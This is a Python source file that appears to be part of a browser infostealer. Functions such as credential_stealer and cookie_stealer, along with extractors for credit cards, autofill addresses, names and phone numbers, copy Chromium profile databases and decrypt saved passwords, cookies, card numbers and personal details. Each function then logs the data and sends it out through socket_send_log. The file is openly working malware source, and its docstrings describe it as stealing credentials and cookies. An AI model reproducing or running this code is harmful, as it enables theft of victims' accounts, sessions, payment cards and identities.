def credential_stealer(browser: dict, encryption_key: str) -> None:
""" Steals credentials from a browser and places them into the logs directory """
# Examine each profile
profile_names = get_profiles(browser)
for profile_name in profile_names:
# Copy original sqlite3 database to access it without killing any active Chromium processes
db_path = create_temp_file(browser, profile_name, 'Login Data')
# Access sqlite3 database
db_connection = sqlite3.connect(db_path)
cursor = db_connection.cursor()
# Extract encrypted credentials from database
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
data = cursor.fetchall()
# Decrypt credentials
credentials = [{
'url': try_decrypt(url, encryption_key),
'username': try_decrypt(username, encryption_key),
'password': try_decrypt(password, encryption_key),
} for url, username, password in data]
# Logs credentials
if credentials:
log_file_name = profile_name + ' Credentials'
log_data(credentials, browser['name'], log_file_name)
socket_send_log(credentials, browser['name'], log_file_name)
# Close sqlite3 connection
cursor.close()
db_connection.close()
def extract_web_history(db_cursor, encryption_key: str) -> list[dict]:
# Query data
db_cursor.execute('SELECT title, url, last_visit_time FROM urls')
# Process and return data
data = [{
'title': try_decrypt(title, encryption_key),
'url': try_decrypt(url, encryption_key),
'last_visit_time': try_decrypt(last_visit_time, encryption_key),
} for title, url, last_visit_time in db_cursor.fetchall()]
return data
def extract_search_history(db_cursor, encryption_key: str) -> list[str]:
# Query data
db_cursor.execute('SELECT term FROM keyword_search_terms')
# Process and return data
return [
try_decrypt(row[0], encryption_key) for row in db_cursor.fetchall()
]
def extract_autofill(browser_name: str, profile_name: str, encryption_key: str,
db_cursor) -> None:
""" Extracts data from the autofill table and places them into the logs directory """
# Query data
db_cursor.execute('SELECT name, value FROM autofill')
# Process data
data = [{
'field': try_decrypt(name, encryption_key),
'value': try_decrypt(value, encryption_key),
} for name, value in db_cursor.fetchall()]
# Log data
if data:
log_file_name = profile_name + ' Autofill Fields'
log_data(data, browser_name, log_file_name)
socket_send_log(data, browser_name, log_file_name)
def extract_credit_cards(browser_name: str, profile_name: str,
encryption_key: str, db_cursor) -> None:
""" Extracts data from the credit_cards table and places them into the logs directory """
# Query data
query = 'SELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cards'
db_cursor.execute(query)
# Process data
data = [{
'card_number': try_decrypt(encrypted_card_number, encryption_key),
'name_on_card': try_decrypt(name, encryption_key),
'expiration_month': try_decrypt(expr_month, encryption_key),
'expiration_year': try_decrypt(expr_year, encryption_key),
} for encrypted_card_number, name, expr_month, expr_year in
db_cursor.fetchall()]
# Log data
if data:
log_file_name = profile_name + ' Credit Cards'
log_data(data, browser_name, log_file_name)
socket_send_log(data, browser_name, log_file_name)
def extract_autofill_addresses(browser_name: str, profile_name: str,
encryption_key: str, db_cursor) -> None:
""" Extracts data from the autofill_profile_addresses table and places them into the logs directory """
# Query data
query = 'SELECT street_address, city, state, zip_code, country_code FROM autofill_profile_addresses'
db_cursor.execute(query)
# Process data
data = [{
'street_address': try_decrypt(street_address, encryption_key),
'city': try_decrypt(city, encryption_key),
'state': try_decrypt(state, encryption_key),
'zip_code': try_decrypt(zip_code, encryption_key),
'country_code': try_decrypt(country_code, encryption_key),
} for street_address, city, state, zip_code, country_code in
db_cursor.fetchall()]
# Log data
if data:
log_file_name = profile_name + ' Autofill Addresses'
log_data(data, browser_name, log_file_name)
socket_send_log(data, browser_name, log_file_name)
def extract_autofill_names(browser_name: str, profile_name: str,
encryption_key: str, db_cursor) -> None:
""" Extracts data from the autofill_profile_names table and places them into the logs directory """
# Query full name data
db_cursor.execute('SELECT full_name FROM autofill_profile_names')
names = [
try_decrypt(row[0], encryption_key) for row in db_cursor.fetchall()
]
# Extract titles if possible
titles = [''] * len(names)
try:
db_cursor.execute(
'SELECT honorific_prefix FROM autofill_profile_names')
titles = [
try_decrypt(row[0], encryption_key)
for row in db_cursor.fetchall()
]
except sqlite3.OperationalError:
# ignore title if unable to extract any
pass
# Process data
data = set()
assert len(titles) == len(names)
for title, full_name in zip(titles, names):
# ignore title or full_name if None
name = (title or '') + (full_name or '')
if name:
data.add(name)
data = list(data)
# Log data
if data:
log_file_name = profile_name + ' Autofill Names'
log_data(data, browser_name, log_file_name)
socket_send_log(data, browser_name, log_file_name)
def cookie_stealer(browser: dict, encryption_key: str) -> None:
""" Steals cookies from a browser and places them into the logs directory """
# Examine each profile
profile_names = get_profiles(browser)
for profile_name in profile_names:
# Copy original sqlite3 database to access it without killing any active Chromium processes
db_path = create_temp_file(browser, profile_name, 'Cookies')
# Access sqlite3 database
db_connection = sqlite3.connect(db_path)
cursor = db_connection.cursor()
# Extract encrypted cookies from database
cursor.execute(
'SELECT host_key, path, name, encrypted_value, expires_utc FROM cookies'
)
data = cursor.fetchall()
# Decrypt cookies
cookie_jar = [{
'host_key': try_decrypt(host_key, encryption_key),
'path': try_decrypt(path, encryption_key),
'name': try_decrypt(name, encryption_key),
'value': try_decrypt(encrypted_value, encryption_key),
'expires_utc': try_decrypt(expires_utc, encryption_key),
} for host_key, path, name, encrypted_value, expires_utc in data]
# Logs cookies
if cookie_jar:
log_file_name = profile_name + ' Cookies'
log_data(cookie_jar, browser['name'], log_file_name)
socket_send_log(cookie_jar, browser['name'], log_file_name)
# Close sqlite3 connection
cursor.close()
db_connection.close()
def extract_autofill_phones(browser_name: str, profile_name: str,
encryption_key: str, db_cursor) -> None:
""" Extracts data from the autofill_profile_phones table and places them into the logs directory """
# Query data
db_cursor.execute('SELECT number FROM autofill_profile_phones')
# Process data
data = [
try_decrypt(row[0], encryption_key) for row in db_cursor.fetchall()
]
data = [number for number in set(data) if number]
# Log data
if data:
log_file_name = profile_name + ' Autofill Phones'
log_data(data, browser_name, log_file_name)
socket_send_log(data, browser_name, log_file_name)
